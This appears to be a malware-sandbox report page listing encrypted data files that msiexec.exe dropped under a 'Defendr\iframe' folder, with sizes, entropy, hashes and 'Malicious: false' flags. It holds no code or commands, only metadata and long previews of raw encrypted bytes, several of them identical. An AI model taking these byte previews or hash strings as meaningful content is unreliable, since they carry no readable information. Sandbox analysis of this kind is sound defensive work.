Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv41.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	39585
Entropy (8bit):	7.9960939395156245
Encrypted:	true
SSDEEP:	768:BW6NFGFd4QWyWse5zIJX/0Na7USo10TT4Od6lGD9raH5L1sPklLfoN+C:BW6SFdlIzMP0NfSsGTrd60prm5L1L2Nh
MD5:	C2E464DDD469ED66377B1D87DAF374E9
SHA1:	872D185AC8B901066A18363671F5CF82577D343D
SHA-256:	B8B6885914A26B0783B641F8FBCAAF2B9AB77DA95052ADCA3D72AC8A2D85275A
SHA-512:	C95D062EB5A071342911C5A9DC504054FD449AD1DF0E12A7407A88829D2A8CC66D552536E3185A4627B1A6BDD2F3ED9718653C67874791E27D9DDD5A8EA7F6C9
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv42.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100537
Entropy (8bit):	7.9980900812264775
Encrypted:	true
SSDEEP:	1536:BW6jkgvEOKgj31aCxB7AgOUNEBaBAFdl52UD9uVwwIZpxtYeoyMIvWZLdy:oW3tKgtxBM8jAFdO+9uVwwIptYoM7Hy
MD5:	F073FEC496AC5960CD531E513B582CC9
SHA1:	452E711982ED3EEFC4DAC87D35168FB71BAE072B
SHA-256:	C0177D09026E291B5D9AB07270EB11AF84E803035EF40AB3E049C5A6222B608A
SHA-512:	F817FDCA3208C4C0773F4AA85607B0CA8EC17DDEA8669CDE8DB791A156E2D8FA0E2948B7CDF9AB50D2CCCB0013C59B4EA289A284199F084B95F5F361C33A9FC6
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv42.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	33474
Entropy (8bit):	7.993793390704863
Encrypted:	true
SSDEEP:	768:BW6NulOXTDacv8T8j9H89dag3n6/xbqYWtdtOBvSt2UHQ+NZAk:BW66OXHLU8jV89LUPWBt2UHbNZj
MD5:	CC1DF6047E4681437B87702D383BBD98
SHA1:	D92EE9749E6A0ADCA26B5BE52995528159BD153F
SHA-256:	21F765962B28615E8AC9FA0E54D71B14E85A44726B2EF67D8A2C8B0B1D800A34
SHA-512:	F40F9D13125CB716A92172DF40DDAC2D0296C80701B25115E79E07E1F9157343ECBB981264D63CDA2C53555F661F4EF4350250D9768760F05339D1D48E2AB42D
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv43.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	94068
Entropy (8bit):	7.997730230347179
Encrypted:	true
SSDEEP:	1536:BW6avOkNbLnegxT6Qa8DWEFkBFRHZPAkvWCeIqmoFM2wVLKcThJ:o+k4gcGioe5Pzv1eIqm21QLKcFJ
MD5:	52DBFE44F46C542099A53306A1E20721
SHA1:	6AD3B8DE484520F4B35AFAEF79380BA16038EDC2
SHA-256:	E828D0D534098273B0F77F37A95A07F1451D0F594902F34768337AD2C381EB17
SHA-512:	88E1ACB045F826CC7D94197D52CEF676A6B52AAB8CC4FF814867C329D8FB0158DCF0C855B1ADAC4E9E44C7A62D27431B94A1E6BC58086C0144F7C1816C6BD71B
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv43.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	27801
Entropy (8bit):	7.993413795984102
Encrypted:	true
SSDEEP:	768:BW6Nw/Q/zvpl32Cp/vaiQLt4YCfocDu0jlVCNMQm2KUPQOknsx:BW6uyzvpl3BJQR+focTlcNXmh5OCI
MD5:	87AF00A1137B5F8D1E68C3BF739A5BC1
SHA1:	0B46C8C6819134DEC64A985278517738F89856AE
SHA-256:	86D5C6999F042D4ED076DB76B6F24FD94B462A88AB146922CAD236DFC6DD1C8B
SHA-512:	9397360C7A294CC9DB1D84266F90F6E81E42FBAF93B1531203385637DF53DC9696CE7EA024D690C5D09D025C964210EBE91D8CDFD70C34A87944E5B6DC3D3044
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv44.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	99074
Entropy (8bit):	7.998093404053396
Encrypted:	true
SSDEEP:	3072:ouvF/yBobA2DKdpveu2SzyIH7FU7yNAZC:oWbApdpmY9WXZC
MD5:	AA3B049417B78B1453B7F83A8840704D
SHA1:	D51ED06C114F7C6DDF4EB95BEC14BF84631DBE41
SHA-256:	5DE3E13B34DD3AAF6B4732C189D9AA396EA672A53B6D39638D7B13BFB25A11FD
SHA-512:	4ECA3C30079B880DD4A41E28836E14EDD316AF69F8DBBF3680702933F57B461B2164C1DC11395D28F81B56507BCA49A2119D8A61DA18966CD685E36E489951EF
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv44.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	31845
Entropy (8bit):	7.994830977471325
Encrypted:	true
SSDEEP:	768:BW6NXTsdEv2rxnAUAJYb/Kqj8JZjbZsLbBn:BW6ds/rKUUSCqjmZjbeLN
MD5:	AE721CD59DF67789B72FE5FEBC3903F3
SHA1:	A1AC6F678715E98E6DC412E3B06BF9556181B4D3
SHA-256:	929295B2FDDF474A277B72791FDAE5F9E606C37C6EA553B45ADDF0558A0F89F7
SHA-512:	EBFA7BDE6E57B6FB5BF114E92E2CCB71963D8B5520F386350F2C576B0A5F6A70F7CE477341852BD79140A0BD07969DF91FC02834FD837A64DD08510F4F1752A1
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv45.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	53792
Entropy (8bit):	7.996398865809003
Encrypted:	true
SSDEEP:	1536:BW63wQHGB+Ee6ignaq2v0MZe+/OjwqHhWDNuy:oOwQHw7e6ba/HBWjxQhn
MD5:	E5BE9FE9FC69D4CA4FAE3E164BEEF8F7
SHA1:	4240C824C6D42D0E2804BEFE78B12FF6DD441E31
SHA-256:	B8058CB5EB9C0B765F5A278B8CBF144536150FACF37BD79E4837BA2AD0DEA629
SHA-512:	6F01667CEF0BD072A72B07217B21E5BF6A14AFD3212A17BB106F69F3F479D3788CF928A0A87A71975945B78D9C8B6A2D423B31DC1EDC28B68AABC62F4562F713
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv45.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	31813
Entropy (8bit):	7.994070863700724
Encrypted:	true
SSDEEP:	768:BW6NC8gc37E+Q7Ia3g5fzgXwcMrcgFcKeMLlwWExwP/BC:BW6jzrQEaQ5f8grI3KeQlwWuwP/Q
MD5:	48CA22EB8386290DFD54E8C474879B52
SHA1:	311CE04FD8D3C5ACD3BFA13BB3024116F653249C
SHA-256:	3C52B3127BDCF7C2AF11243F0A51DD46FC4A8BF458C8C6FA109EA3F92A60534C
SHA-512:	7EB4E12727F50E75410F9986238B69274C2091E30BFC49459738D93B3CC19E54432C934E121A4656DB114D021BC8DF3A3E388D5755A3D0D583FBF77081E49F7A
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv45.2.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	103785
Entropy (8bit):	7.998154804983971
Encrypted:	true
SSDEEP:	1536:Z3LmKk9efPMQ8014sMlerA6hmOGcpx9/jz8Uf3OxCOurgcrPZ5lBWz1ZWEb5:Z3bFMQ8eMSx9vVuCNkMzBG7Wy5
MD5:	FDCDBBBAEE3059F45AFE1563E6CBBFA1
SHA1:	070C618BD94A68CBBEF90A7881613374B10188D0
SHA-256:	14B18605E1084E969EB0FD796C07FD885ADA907947291AF17997DC91513E4DD5
SHA-512:	97DD90D5317B04B825BA3D47F2083155441DE41F23B077D64DD98871C55EDF01C9BCA64F593DC1CB54B7A956551C76E6BF35A0167BE061B9E5B0781BFF22BC84
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..s.....n...H.n..]...f..7.....".L.:.M4r.v.t..b..tO..~.....&.G.....;.....,}..E<..23!...\i]...n.!...I7}(.V.'...x. .......nDB..P.^.1..A.l.-..h.r.BC.Y........7d.......\..Uel^.....^y./...?.W..0.(....K..tg..l.......4.yYQ...HJ.:T-]!U.=TB..=?..s..'.< #yE<..`FY.g...t...X........c..]!b6...+....NrX...&.I.v.J.d._..{.]k<q..?......<-.......u.7.Q...*v..#.V..G.A...?.u.{.,..%\0L%Q...$M1+.'...=}....S....w.....0.~.BQ....S7A.A"TL.4..]..=.....}...lJ..".o.w.........9.N.fKN......D.}.........uE.f..(#../....gw..._o9..!Mz....A...;\|...tn.#.<.f..q...:. .F+K.......X....^....C..../.Pi..a.{=[.r........VG....G....W(SY......:.u$.z,X.j... ..e......Q.AFs...(.h'........M_9WU.....5B<.....>....pE..7....Y.!,.2U...YKx.#&Y.<+.f.0~.R.E..J.Q..##..;IW\=..P...Vt.......hm....<..p.<...D.D..X..1..2.i04yzo%+CN._..MH..a.%....I.F......1...i...u.I.>+.G.n..<F,y.@6.iC..S..@>T3..Nv....;..^N\|}../ihys.?..2.\..KB.ln ...2.m/..R...Y.mp...m.7<\.ax....H..I0Y...

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv45.3.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	33413
Entropy (8bit):	7.994738128765888
Encrypted:	true
SSDEEP:	768:byWV4zwDjLTC/6c32Cew4cflNwBEm+AnBLB3TO3Kxj:YwD3TC/JGNw4MlNwDNBVC6h
MD5:	CEC8262AEAE454048A13FCEF64416666
SHA1:	48BF36FE244FC7300195796678D8D560032B718A
SHA-256:	BAD738A7A5E22A0B4DD9C6A440FF722D75B562F0D7E3052427EDE9F57BBC9EF6
SHA-512:	077E68C3C5EA91CAF3DA8EB91BF0A117CF83BB76CB57E4F54106D87A18D320478E4643CDC96C03CD9B94C6D10E7F79C87500DCBB0C639EF51959FFB38A7A2D0D
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..s.....n...H.n..]...f..7...7,X. 3g..XT..B...0.RQ\|!..<.s.y..o.).....}=jW.........0.....A..4.x..9E.]..../9...9..q..t....o....... ..H{.......y3...CA......9....FF...?...F.C..e.}..B?.;...P3.NY......o.F.M....$.bn.]R...6...A.l.$..n. ....!...is.6'. Y.m...G.rSB-t......<E..2S..;../.L..H.....'Bc}f.A.HIw..a...fc.c:.^K.c......t...`...q..p.D.Q...Kv4...4.9\..@......x.g4d...S1....6.6D...?.J.H.)...;.iQ... ..C.......\|5...oD.c._....b..'....z..2..\..cc.\|R.yCU#..N./.v..@.\'..H\f...eo.6.}..].......'Z....?"c..FH+.A.....#..X..u..,....Q..>gB{\. G...b.=.....Z\....i".>?.....X\..\|J79..,...6..I/..[..,..g.....".;...C.m.....(...U../...&?..2...!.......\t*...~...8e;;:A.....`z.%....8.Hk.>hl......-L....Lyi.p.j...q }z\..=.;..=r/.1....m.....Y..3.K.[..<.....].0..S/.d.t.WYn.,Y..%.M......cYpL.`.C.<&.,.....h..&.Yf8R^..?.h.z...)..h.5h.'..@...W2.n..a.....l.WIT.4.Z..sk..g.V.k.Axs....a..&...a.....b..'.o...6Fdw.;...!....^D..2P^...a].L..^..Q.

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv45.4.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	65702
Entropy (8bit):	7.997244020702617
Encrypted:	true
SSDEEP:	1536:QayRKcGIakNwN56RcUfoZHhn0t9fAIH8TBOg:oRKEak+N56RZoZNu7H81Og
MD5:	C6607EDBDDFB082E9BA6689D3AEA1E53
SHA1:	68FED24E716D40BBE87B8A0A34B19F6D8A78D151
SHA-256:	F082CAC36BBBA6DE1C63C117C7088EF6467471358ABCF0941686CDD7A87BFD3B
SHA-512:	6EEF8E376A5E21E4F0750D0849CA2C0AB76D77DCB69E21908F5B2A4BAB9911F4E2CC504C4CEE0DB2696F21B236712D3DF13DC74CD01522AE01C0677C497FD3A9
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..s.....n...H.n..]...f..7.9x.R8......N....@DiJ.MHYD.f9..:..y.r....a.Np.V..bQ#......."l.....4,P."pe...>...>..x+.....yC..)A./P..\|..E...V....(G.m\|...s.m.h/..q..yP..\...64.;..sZ-Y..4"..0+m..........4...oO.cb.....M..........,..Q...=8.E..pm.9.......6..s.].......BZ..{I<f)h.....\|.~..-.y!...Pn..%.R.......\|............kF..z....nZ\q.i{...$...jV.\y.Bw....,o!,..\.....8.....K+..O.^...Ia....dI.?rK.Dp8f.Qs..&...8...#=1.<.....0..(....Z.thXq\|....4Z3t.....kY...h..?..._.Uw./......3 .........}..H....U...%.Rs...p.:...8HK@...m...OgW#(.F..(L...dI.~0M.....(.q..J..8S.....)..t.6......>h.5.5 ...N-....3 .Ky}X..C-....]...+..Lyk....?....u.F;Y...D.....?.L_..qT....:y(r.].I.r\|...;._=."$.0.\|.....sS......N..../S.,...[..S...O...".B...,...jV..Z.T.n.F~b.R...=.x...\.Cf.e..``.:8..$...&.4.....C..l.R...X.lLF.`yZ..\\V._...\|5...V.....A..O....\|.;v..D47).%."Cdw..]...K#.+I.......;hEC......8..8.l.6.i.+.G.n;...Y.-aO5..N......S...Z...z.X..*.y.&$

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv46.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	87089
Entropy (8bit):	7.997443715084655
Encrypted:	true
SSDEEP:	1536:k8LUgVYfcS3/AvCcvyQ8FZPXYjkdzrMTfOEvXcc/KjRqVGeS5owgq1O:bxccSPmv/8FeodzAz+cCjRqfatgL
MD5:	9FB28A483FE0F6E313424ADC933F2018
SHA1:	D9A04488876058281DDB52E8CBCEE17E65FD38CD
SHA-256:	844CAE30A329226B37557F2A4F5E3EC39B9BA5668F0FD85535121D17EB05D051
SHA-512:	EF21FBAA9F5DA834F2A0996A2CDDE8E94CD061A25B11BA75A3FBD57A04BC01B6F315043058D4878FE0B7E751877D93A84441B7162ADA4B99AB93322FEE8B51DB
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..P..(.i:..V&..o$5..f...`#'..F.....+..y\|qN......Y.l@..._..E. ...N.;D@.2.5..l._....n.k.U.).E....1.R..l6..m..u...!.ZJ.......ZUb._...'.......g....];.I.-.Z#..G..oU`.-.!/..`.\)7.,z.~/...K......l...7.....@.,s@.T.@] 4#..[..b.F..5h$t......O.D.......NC..w...(.mC.G....^}.J.#."7:.......9..^..G\.6....W..U.Z.<.wI.../\&C].....H....!;.-U...!........Ay.(P..k.........w.bE...?.L...W......z.fe......I2...d..y.n..N..F.T=...[....Bzm.8.cD.YV....Y.NR.....pS..=.G..7.Q.k.bHH.....~sv5gC.$..ns69+..i..........a.]..Z0..O...T...2.\.......Z....?.....E.0./..e+.?hDV..5H..`..B`Y.3T...........TS.dE+..1y..C.9.<...f..E.K:...R.a.....q.......ga..X....!"..BW.B../.2A.661....y..C.....r,.Y.V+..U}Z..j.2R......P....[`y.>s?.w.....N4..z.jDKc..#.X.q.(<;..h.p>#9.Y.V\|......X.m.:^..(.F.m.R.....{.K..........KY.c...e^..A]SN,1.S....ow......P.c..}...d.`59V.E\|.D.(....6.gmi..$..}..Bv!.d"Q.......m.HR$w!.....;...X{s.b!.;...VV......6.1...c...8...z..0.zke..K..2K.

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv46.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	19144
Entropy (8bit):	7.989739913507628
Encrypted:	false
SSDEEP:	384:1Fr1b+1SUYj7Jb4sSC/bydlgqaSMBYRy8dhzRuI27y8OYRMHfw:1/GSUYeH4qa7Yx27y8Yfw
MD5:	0CF5444E3F86C21B31BDE867F575EEAB
SHA1:	D81B7FB4178FDBD274DC36713A95B85F7B2CF260
SHA-256:	7C9437E6BCA2A03FB75E5EE49F4215BC96FC295FB0C2CA3311FB61559763B5EF
SHA-512:	D0F1DD79EF572E3BB3B01F454914957D7E2D80494FECC025286CE2A87AA8E370337D47EB8CDB85E7CDEA9D841C46BC4A9E1AC831B0DF1B32512B689EBC429F09
Malicious:	false
